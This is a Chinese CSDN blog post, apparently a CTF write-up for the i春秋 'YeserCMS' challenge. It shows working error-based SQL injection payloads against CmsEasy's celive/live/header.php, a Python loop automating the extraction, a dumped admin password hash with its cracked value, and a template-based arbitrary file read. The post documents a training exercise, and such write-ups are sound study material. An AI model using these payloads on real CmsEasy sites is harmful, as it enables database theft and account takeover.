i春秋CTF-YeserCMS

最新推荐文章于 2022-06-18 10:18:23 发布
最新推荐文章于 2022-06-18 10:18:23 发布
阅读量797 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qingchenldl/article/details/84576270
版权

分析

打开网站,在文档下载页面用户评论区域,发现是一个EasyCMS

11129189-07a019548ffce11d.png

于是百度EasyCMS的漏洞,发现cmseasy 无限制报错注入(可获取全站信息exp)

访问url/celive/live/header.php,直接进行报错注入

数据库:

xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(database())) ),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>


# 结果:
XPATH syntax error: '[Yeser]'

INSERT INTO `yesercms_detail` (`chatid`,`detail`,`who_witter`) VALUES('','xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(database())) ),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- (2018-09-06 17:06:08)','2')

数据表:

这里需要注意一下:group_concat取数据的32位,因此不能完全爆出数据表,需要调整1,32才行

xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database()),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>


# 结果
XPATH syntax error: '[yesercms_a_attachment,yesercms_'

## python脚本跑一下
import requests
url = 'http://e32e8eceff7a4e3f922fe2640f1c82a67a059c73c2f44c14.game.ichunqiu.com/celive/live/header.php'
for i in range(1,999,31):
    postdata = {
    'xajax':'Postdata',
    'xajaxargs[0]':"<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database()),%s,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>" %str(i)
}
    r = requests.post(url,data=postdata)
    print r.content[22:53]

简单的python,循环跑一下,也是可以出来的,但是表太多了,我是不太知道大佬们怎么精准定位到yesercms_user

yesercms_a_attachment,yesercms_a_comment,yesercms_a_rank,yesercms_a_vote,yesercms_activity,yesercms_announcement,yesercms_archive,yesercms_assigns,yesercms_b_arctag,yesercms_b_area,yesercms_b_category,yesercms_b_special,yesercms_b_tag,yesercms_ballot,yesercms_bbs_archive,yesercms_bbs_category,yesercms_bbs_label,yesercms_bbs_reply,yesercms_chat,yesercms_departments,yesercms_detail,yesercms_event,yesercms_friendlink,yesercms_guestbook,yesercms_linkword,yesercms_my_a,yesercms_my_yingpin,yesercms_operators,yesercms_option,yesercms_p_orders,yesercms_p_pay,yesercms_p_shipping,yesercms_pay_exchange,yesercms_sessions,yesercms_settings,yesercms_templatetag,yesercms_type,yesercms_union,yesercms_union_pay,yesercms_union_visit,yesercms_user,yesercms_usergroup

最后爆出数据:

xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from yesercms_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>

XPATH syntax error: '[admin|ff512d4240cbbdeafada404677ccbe61]'

这里也是一样,只会显示32位字符,需要调整一下,得到账户密码。

MD5反解密码SOMD5Yeser231

进入后台页面,


11129189-9539e24b665ece65.png

想着通过上传图片拿shell,但是发现根本不存在这个类

11129189-12c6b83072e71e6c.png

于是想在当前模板中插入一个木马拿shell,结果保存不了!!

看了别人的WP,发现原来调用当前模板的时候用的是读文件的函数,也就是说,可以利用这个对文件的函数读取任意文件:

11129189-7c9cff77c3ab7f56.png

更改id 用于读flag,发现可行,getFlag。

知识点

报错注入
EasyCMS 漏洞
读取文件函数的利用

「已注销」
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
限制会话id服务端不共享_【干货分享】Web安全漏洞深入分析及其安全编码
weixin_39930276的博客
12-19 376
阅读:13,003超全Web漏洞详解及其对应的安全编码规则,包括:SQL注入、XSS、CSRF、文件上传、路径遍历、越权、XML以及业务安全等,实例告诉你各个漏洞对应的编码规则。给你的代码加把安全锁!一、Web安全基础1.1常见的Web安全漏洞1.2安全编码原则一切输入都是有害的!!!输出也不安全!输入:传参,cookie、session、http header、数据库……输出:异常信息、敏感...
计算安全漏洞及其对策(一)
DynmicResource的博客
06-17 353
theme: orange 持续创作,加速成长!这是我参与「掘金日新计划 · 6 月更文挑战」的第22天,点击查看活动详情 ???? 个人主页:@青Cheng序员石头 上后,是否不确定如何保护自己免受计算安全漏洞的影响? 前言 基础设施可能很杂,我们都知道杂性是安全的敌人。尽管大多数安全专家都认为,公司可以从内置于中的安全解决方案中获益,但企业也可能犯下严重错误...
re学习笔记(101)i春秋 全国大学生信息安全竞赛 计时挑战
逆向随笔
06-18 975
本文首发于 i春秋公众号 巧用Frida与Unidbg快速在CTF中解题Frida是一个方便快捷的hook框架,在安卓逆向中是必不可少的hook工具。而对代码量不大的CTF安卓逆向题目来讲,使用Frida更是如鱼得水,调试程序、打印输出等都极为方便,就算有相应的检测,由于CTF中代码量并不是很大的情况,也可以快捷的定位、并对其进行hook绕过。而Unidbg可以对so层中的函数进行模拟执行,对于CTF题目来讲,往往无需太多的“补环境”,Unidbg就能将指定的函数模拟执行起来并获得结果。在本文中笔者将以全国
CTF--CMS漏洞总结
woshisz0413的博客
11-27 1万+
CMS漏洞总结 CMS类型题目: 首先判断CMS类型,再查询该CMS曾经出现的漏洞,利用漏洞获取用户名(admin)、密码后进入管理员界面查找注入; 或者上传一句话木马后使用菜刀连接,可能再连接数据库。 (1)CMSEASY类型 可用公开漏洞网站:https://www.seebug.org/appdir/CmsEasy 1.cmseasy 无限制报错注入 步骤:向http://*****/cel...
i春秋-百度杯九月场-YeserCMS(cmseasy的UpdateXML注入漏洞)
weixin_30764137的博客
03-09 902
学习了大佬们的操作才做出来,记录一次菜鸡的无能为力。 tips:flag在网站根目录下的flag.php中。我们的目标就是flag.php了。 题目说是心的CMSYeserCMS,然而百度一下,出来该题的wp之外,并没有这个CMS。可能是把原来的CMS改名了,在网站中找看看有没有什么线索,最后发现有cmseasy的标识: 于是百度寻找cmseasy的漏...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
ctf-all-in-one
01-30
ctf-all-in-one
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
i春秋 CTF大本营 竞赛训练营 200+道题目答案
03-30
i春秋 CTF大本营 竞赛训练营 200+道题目答案 竞赛包括冬令营白帽黑客专项训练赛之春秋杯等 国内比较好的安全知识在线学习平台,把杂的操作系统、工具和网络环境完整的在网页进行重现,为学习者提供完全贴近实际...
CTF-Tools-v1.3.7.zip
01-29
CTF常用工具集
web漏洞挖掘快速入门1
08-08
3. 通过 zmpap 全网爆破查询真实 ip(可靠) 4. 子域名爆破,现在越来越不靠谱了 5. 通过扫描出网站测试文件如 phpinfo,test 等配置文
YeserCMS
weixin_30371875的博客
07-24 220
这道题直接让我们查网站根目录的flag,我首先想到的是一句话木马,但是奈何找不到上传的接口啊,只好作罢, 在下载发现有个cmseasy的标识,明显是要提示我们这里是easycms,百度easycms的漏洞然后注入 注入点: http://cac6d32bf8ff4b52becb3516148c9c106deeaa1e92b64a8e.changame.ichunqiu.com//celive...
i春秋web-Test(海洋CMS漏洞)
Sea_Sand息禅
05-22 1374
前面部分参考https://blog.csdn.net/zz_Caleb/article/details/88244046 以前做过一个漏洞的现,下面只介绍连接上之后的操作。 这里用的是中国蚁剑进行的连接。 这里找到数据库的配置文件,其内容如下: 按照上面给出的数据库信息利用蚁剑来进行数据库的操作: 连接上之后执行查找命令即可: ...
"百度杯"CTF 9月2日 WriteUp.md
Bendawang's Blog
09-04 9650
"百度杯"CTF 9月2日 WriteUp
百度杯CTF Write up集锦 WEB篇
热门推荐
4ct10n
09-21 4万+
九月场1.code一开始的URL为http://ace3c302efed4a9094cbac1dff0250e8add1b4b45f8249d4.game.ichunqiu.com/index.php?jpg=hei.jpg尝试着令jpg=index.php得出了base64编码的文本 丢到解码器里解出文本index.php<?php /** * Created by PhpStorm. *
i春秋WEB CTF 2
cbhjerry的博客
11-16 2761
题6:SQL,出题人就告诉你这是个注入,有种别走! 解题:这是一个存在sql注入漏洞的题目, 通过手工测试发现程序对"SELECT","ORDER"进行了识别,即判断为注入行为,虽然对"AND"不进行识别,但如果其后面有"="同样认定为注入行为。同时发现了对"&lt;&gt;"进行了过滤,因此可将以上3个关键字换成"SELEC&lt;&gt;T",&quo
i春秋 “百度杯”CTF比赛 九月场 SQL
include_heqile的博客
09-12 1387
https://www.ichunqiu.com/battalion?t=1&amp;r=0 看题目就知道这是一道注入题,这道题其实并没有什么难度,主要就是select、union、=等被过滤了,我们需要找到一种有效的绕过方法,这道题的绕过方法就是在敏感字符串中间加上&lt;&gt;,这个是通过提交各种特殊字符串并查看源代码得到的,当我们提交了&lt;&gt;之后,再去查看源代码,会发现源代码界...
i春秋安全勇士--一些简单题wp
xuqi7
07-08 3196
基础题60分   用firebug可以发现一段奇怪的js, 把eval改成alert,运行之后再改一下,最后会就是冒号隔开的一串数 然后改下格式  \x30  这种,然后转16进制,然后是md5解一下就可以了     培根 我年轻时注意到,我每做十件事有九件不成功,于是我就十倍地去努力干下去。—— 萧伯 纳 ABAABAABAAABBAAABBAAAAAAABAAAAAA
[百度杯]九月场 再见CMS writeup
Flyour的博客
04-05 1900
再见CMS 拿到链接是一个博客网站,对于这样的题目: 1. 第一步,肯定是要判断出cms类型 2. 第二步,查询该cms曾经出现的漏洞 3. 第三步,然后利用这些漏洞拿到flag. 第一步:判断cms类型 这是该网站的登录页面,根据这个登录页面和下方的备案号、版权声明的格式都可以判断出这是个齐博cms。 下面是齐博CMS的整站系统:http://v7.qibosof...
ctf-qsnctf此地无银三百
最新发布
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),并提交给平台进行验证。 "此地无银三百"是ctf-qsnctf平台上的一道题目,它的名称可能是一个提示,暗示着解题的思路。具体的解题方法和答案我无法透露,因为这会破坏比赛的公平性和乐趣。如果你对这道题目感兴趣,我建议你在ctf-qsnctf平台上注册账号并参与比赛,通过自己的努力和思考来解决问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值